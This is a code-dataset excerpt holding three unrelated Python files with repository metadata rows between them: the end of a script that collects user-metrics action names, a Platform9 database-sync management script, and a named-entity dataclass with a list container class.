def main(argv):
  """Collect all known user-metrics action names and print them, sorted.

  Arguments:
    argv: command-line arguments (currently unused).
  """
  actions = set()
  # Seed with the programmatically-generated ("computed") action names.
  AddComputedActions(actions)
  AddWebKitEditorActions(actions)
  # Walk the source tree to process all .cc files.
  chrome_root = os.path.join(path_utils.ScriptDir(), '..')
  WalkDirectory(chrome_root, actions)
  webkit_root = os.path.join(path_utils.ScriptDir(), '..', '..', 'webkit')
  WalkDirectory(os.path.join(webkit_root, 'glue'), actions)
  WalkDirectory(os.path.join(webkit_root, 'port'), actions)
  # Print out the actions as a sorted list.
  # NOTE: Python 2 print statement -- this script predates Python 3.
  for action in sorted(actions):
    print action


if '__main__' == __name__:
  main(sys.argv)
| 33.192 | 78 | 0.699446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,249 | 0.542058 |
6381feead03b8bd48b3416770eed49408794f57c | 1,817 | py | Python | hamgr/bin/hamgr-manage.py | platform9/pf9-ha | 7d64f9fe6b72fb4c1e5ed5d23e372a62c9e218a8 | [
"Apache-2.0"
] | 11 | 2016-09-06T09:59:29.000Z | 2021-10-02T07:24:07.000Z | hamgr/bin/hamgr-manage.py | platform9/pf9-ha | 7d64f9fe6b72fb4c1e5ed5d23e372a62c9e218a8 | [
"Apache-2.0"
] | 5 | 2017-10-16T06:47:14.000Z | 2020-07-06T07:20:13.000Z | hamgr/bin/hamgr-manage.py | platform9/pf9-ha | 7d64f9fe6b72fb4c1e5ed5d23e372a62c9e218a8 | [
"Apache-2.0"
] | 3 | 2016-09-01T06:20:51.000Z | 2017-10-16T02:27:07.000Z | #!/bin/env python
# Copyright (c) 2019 Platform9 Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from migrate.exceptions import DatabaseAlreadyControlledError
from migrate.versioning.api import upgrade
from migrate.versioning.api import version_control
from six.moves.configparser import ConfigParser
def _get_arg_parser():
parser = argparse.ArgumentParser(
description="High Availability Manager for VirtualMachines")
parser.add_argument('--config-file', dest='config_file',
default='/etc/pf9/hamgr/hamgr.conf')
parser.add_argument('--command', dest='command', default='db_sync')
return parser.parse_args()
def _version_control(conf):
    """Put the database under sqlalchemy-migrate version control.

    Reads the connection URI and migration repo path from the [database]
    section of `conf`. If the database is already version-controlled, the
    resulting DatabaseAlreadyControlledError is swallowed so repeated
    db_sync runs stay idempotent.
    """
    db_url = conf.get("database", "sqlconnectURI")
    repo_path = conf.get("database", "repo")
    try:
        version_control(db_url, repo_path)
    except DatabaseAlreadyControlledError:
        # Already under version control -- treat as a no-op.
        pass
if __name__ == '__main__':
    parser = _get_arg_parser()
    conf = ConfigParser()
    # Fix: close the config file deterministically -- the previous
    # conf.readfp(open(...)) leaked the file handle.
    with open(parser.config_file) as config_fp:
        conf.readfp(config_fp)
    if parser.command == 'db_sync':
        # Ensure the DB is under version control, then apply migrations
        # from the configured repo up to the latest version.
        _version_control(conf)
        upgrade(conf.get("database", "sqlconnectURI"),
                conf.get("database", "repo"))
        exit(0)
    else:
        print('Unknown command')
        exit(1)
638271269c493149415ea03cdea0dc60c36a233d | 2,898 | py | Python | src/nerb/named_entities.py | johnnygreco/nerb | 1ea395bade7d58b176c965d062987284a2d6f590 | [
"MIT"
] | null | null | null | src/nerb/named_entities.py | johnnygreco/nerb | 1ea395bade7d58b176c965d062987284a2d6f590 | [
"MIT"
] | null | null | null | src/nerb/named_entities.py | johnnygreco/nerb | 1ea395bade7d58b176c965d062987284a2d6f590 | [
"MIT"
] | null | null | null | from __future__ import annotations
# Standard library
import re
from copy import deepcopy
from dataclasses import dataclass
from typing import Callable, Optional
__all__ = ['NamedEntity', 'NamedEntityList']
@dataclass(frozen=True)
class NamedEntity:
    """A single named-entity match.

    Frozen (immutable) so instances are hashable and can safely be shared
    or used as dict keys / set members.
    """

    # Name label of this entity (consumed by NamedEntityList.get_unique_names).
    name: str
    # Entity group/category label.
    entity: str
    # The matched text itself.
    string: str
    # (start, end) pair for the match -- presumably character offsets into
    # the searched text; confirm against the producer of these objects.
    span: tuple[int, int]
class NamedEntityList:
    """Named entity list class.

    A list-like container restricted to NamedEntity elements. Supports
    append/extend/sort/indexing/concatenation like a plain list, plus
    helpers such as get_unique_names().
    """

    def __init__(self, init_list: Optional[list] = None):
        """Create a list, optionally seeded with NamedEntity objects.

        Parameters
        ----------
        init_list : list, optional
            Initial elements. Shallow-copied so that later mutation of the
            caller's list cannot silently alter this container (the previous
            implementation stored the caller's list by reference).
        """
        self._list = [] if init_list is None else list(init_list)

    def append(self, entity: NamedEntity):
        """Append entity to this list, where the element must be of type NamedEntity."""
        if not isinstance(entity, NamedEntity):
            raise TypeError(
                f'{self.__class__.__name__} holds {NamedEntity} objects. You gave {type(entity)}.')
        self._list.append(entity)

    def copy(self):
        """Return a deep copy of this list."""
        return deepcopy(self)

    def extend(self, entity_list: NamedEntityList | list[NamedEntity]):
        """Extend list. Similar to the standard python list object, extend takes an iterable as an argument."""
        if not isinstance(entity_list, (NamedEntityList, list)):
            raise TypeError(
                f'Expected object of type {self.__class__.__name__} or list. You gave {type(entity_list)}.'
            )
        # Route through append() so element type-checking still applies.
        for elem in entity_list:
            self.append(elem)

    def get_unique_names(self) -> set[str]:
        """Return set of the unique names in this NamedEntityList."""
        # Set comprehension instead of set([...]) -- skips the throwaway list.
        return {entity.name for entity in self}

    def sort(self, key: Callable, *, reverse: bool = False) -> None:
        """
        Sort the list according to the given key. The sort is executed in-place.

        Parameters
        ----------
        key : callable (e.g., a lambda function)
            Function that defines how the list should be sorted.
        reverse : bool, optional
            If True, sort in descending order.
        """
        self._list.sort(key=key, reverse=reverse)

    def __add__(self, other: NamedEntityList):
        """Concatenate two lists into a new NamedEntityList."""
        return self.__class__(list(self) + list(other))

    def __getitem__(self, item):
        """Index with an int, slice, or list of indices (fancy indexing)."""
        if isinstance(item, list):
            return self.__class__([self._list[i] for i in item])
        elif isinstance(item, slice):
            return self.__class__(self._list[item])
        else:
            return self._list[item]

    def __iter__(self):
        return iter(self._list)

    def __len__(self):
        return len(self._list)

    def __repr__(self):
        # Local renamed from 'repr' to avoid shadowing the builtin repr().
        body = '\n'.join(f'[{i}] {p.__repr__()}' for i, p in enumerate(self))
        body = re.sub(r'^', ' ' * 4, body, flags=re.M)
        # The f-string around '([])' was pointless (no placeholders).
        body = f'(\n{body}\n)' if len(self) > 0 else '([])'
        return f'{self.__class__.__name__}{body}'